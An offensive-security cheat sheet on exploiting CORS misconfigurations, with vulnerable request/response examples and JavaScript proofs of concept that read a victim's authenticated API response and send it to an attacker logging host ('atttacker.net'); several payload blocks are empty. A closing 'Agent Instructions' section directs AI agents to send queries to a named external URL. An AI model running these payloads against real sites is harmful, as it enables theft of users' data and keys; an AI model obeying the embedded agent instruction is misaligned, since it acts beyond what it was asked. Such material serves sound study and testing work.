# CORS > A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. ### Summary * Prerequisites * Exploitation * References ### Prerequisites * BURP HEADER (Request) > `Origin: https://evil.com` * VICTIM HEADER (Response) > `Access-Control-Allow-Credential: true` * VICTIM HEADER (Response) > `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null` * BURP HEADER (Request) > `Origin: Null` AND the Response `Access-Control-Allow-Origin: null` > We should check manually, do not just rely on the origin request header. ### Exploitation Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target . #### Vulnerable Example: Origin Reflection **Vulnerable Implementation** ``` GET /endpoint HTTP/1.1 Host: victim.example.com Origin: https://evil.com Cookie: sessionid=... HTTP/1.1 200 OK Access-Control-Allow-Origin: https://evil.com Access-Control-Allow-Credentials: true {"[private API key]"} ``` **Proof of concept** ```javascript var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://victim.example.com/endpoint',true); req.withCredentials = true; req.send(); function reqListener() { location='//atttacker.net/log?key='+this.responseText; }; ``` or ```markup

CORS PoC

``` > Standard CORS requests do not send or set any cookies by default. In order to include cookies as part of the request, you need to set the XMLHttpRequest’s .withCredentials property to true #### Vulnerable Example: Null Origin **Vulnerable Implementation** It's possible that the server does not reflect the complete `Origin` header but that the `null` origin is allowed. This would look like this in the server's response: ``` GET /endpoint HTTP/1.1 Host: victim.example.com Origin: null Cookie: sessionid=... HTTP/1.1 200 OK Access-Control-Allow-Origin: null Access-Control-Allow-Credentials: true {"[private API key]"} ``` **Proof of concept** This can be exploited by putting the attack code into an iframe using the data URI scheme. If the data URI scheme is used, the browser will use the `null` origin in the request: ```markup ``` #### Vulnerable Example: XSS on Trusted Origin If the application does implement a strict whitelist of allowed origins, the exploit codes from above do not work. But if you have an XSS on a trusted origin, you can inject the exploit coded from above in order to exploit CORS again. ``` https://trusted-origin.example.com/?xss= ``` Sometimes, the payloads does not pop up via XSS. You should also get the response from the console. ``` https://trusted-origin.example.com/?xss= ``` Go to the Console and ask for: `req.response` ![](/files/-M6malpKFvMKm3aj7DWZ) #### Vulnerable Example: Wildcard Origin `*` without Credentials If the server responds with a wildcard origin `*`, the browser does never send the cookies. However, if the server does not require authentication, it's still possible to access the data on the server. This can happen on internal servers that are not accessible from the Internet. The attacker's website can then pivot into the internal network and access the server's data withotu authentication. **Vulnerable Implementation** ``` GET /endpoint HTTP/1.1 Host: api.internal.example.com Origin: https://evil.com HTTP/1.1 200 OK Access-Control-Allow-Origin: * {"[private API key]"} ``` **Proof of concept** ```javascript var req = new XMLHttpRequest(); req.onload = reqListener; req.open('get','https://api.internal.example.com/endpoint',true); req.send(); function reqListener() { location='//atttacker.net/log?key='+this.responseText; }; ``` ### Bug Bounty reports * [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) * [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147) * [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) * [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249) * [\[██████\] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) ### References * [CORS Introduction](https://www.html5rocks.com/en/tutorials/cors/) * [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) * [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) * [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) * [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) * [PortSwigger Web Security Academy: CORS](https://portswigger.net/web-security/cors) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://enderspub.kubertu.com/cors.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.